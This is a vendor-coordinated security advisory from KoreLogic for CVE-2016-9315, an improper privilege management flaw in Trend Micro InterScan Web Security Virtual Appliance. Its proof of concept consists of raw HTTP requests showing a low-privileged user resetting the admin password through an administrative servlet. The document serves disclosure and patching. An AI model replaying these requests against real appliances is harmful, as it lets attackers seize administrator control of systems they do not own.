KL-001-2017-002 : Trendmicro InterScan Privilege Escalation Vulnerability

Title: Trendmicro InterScan Privilege Escalation Vulnerability
Advisory ID: KL-001-2017-002
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-002.txt


1. Vulnerability Details

     Affected Vendor: Trendmicro
     Affected Product: InterScan Web Security Virtual Appliance
     Affected Version: OS Version 3.5.1321.el6.x86_64; Application
                       Version 6.5-SP2_Build_Linux_1548
     Platform: Embedded Linux
     CWE Classification: CWE-269: Improper Privilege Management
     Impact: Privilege Escalation
     Attack vector: HTTP
     CVE-ID: CVE-2016-9315

2. Vulnerability Description

     Any authenticated user can execute administrative functionality

3. Technical Description

     1. Login as least privileged user role.

     POST /uilogonsubmit.jsp HTTP/1.1
     Host: 1.3.3.8:8443
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Referer: https://1.3.3.8:8443/logon.jsp
     Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 62

     wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On

     HTTP/1.1 302 Found
     Server: Apache-Coyote/1.1
     Pragma: no-cache
     Cache-Control: no-cache
     Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
     Content-Type: text/html;charset=UTF-8
     Content-Length: 0
     Date: Tue, 25 Oct 2016 15:02:24 GMT
     Connection: close

     2. Use session identifier to run administrator functionality to change
admin password.

     POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
     Host: 1.3.3.8:8443
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Referer:
https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
     Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 280


CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0

     HTTP/1.1 302 Found
     Server: Apache-Coyote/1.1
     Location:
https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
     Content-Length: 0
     Date: Tue, 25 Oct 2016 15:03:37 GMT
     Connection: close

     3. Login as admin

     POST /uilogonsubmit.jsp HTTP/1.1
     Host: 1.3.3.8:8443
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Referer:
https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
     Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 27

     uid=admin&passwd=korelogic2

     HTTP/1.1 302 Found
     Server: Apache-Coyote/1.1
     Pragma: no-cache
     Cache-Control: no-cache
     Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
     Content-Type: text/html;charset=UTF-8
     Content-Length: 0
     Date: Tue, 25 Oct 2016 15:03:54 GMT
     Connection: close

4. Mitigation and Remediation Recommendation

     The vendor has issued a patch for this vulnerability in Version
     6.5 CP 1737. Security advisory and link to the patched version
     available at:

     https://success.trendmicro.com/solution/1116672

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.12.12 - KoreLogic sends vulnerability report and PoC to
                  Trendmicro.
     2016.12.12 - Trendmicro acknowledges receipt of report.
     2017.01.11 - Trendmicro informs KoreLogic that the patch to
                  this and other KoreLogic reported issues will
                  likely be available after the 45 business day
                  deadline (2017.02.16).
     2017.02.06 - Trendmicro informs KoreLogic that the patched
                  version will be available by 2017.02.14.
     2017.02.14 - Trendmicro security advisory released.
     2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt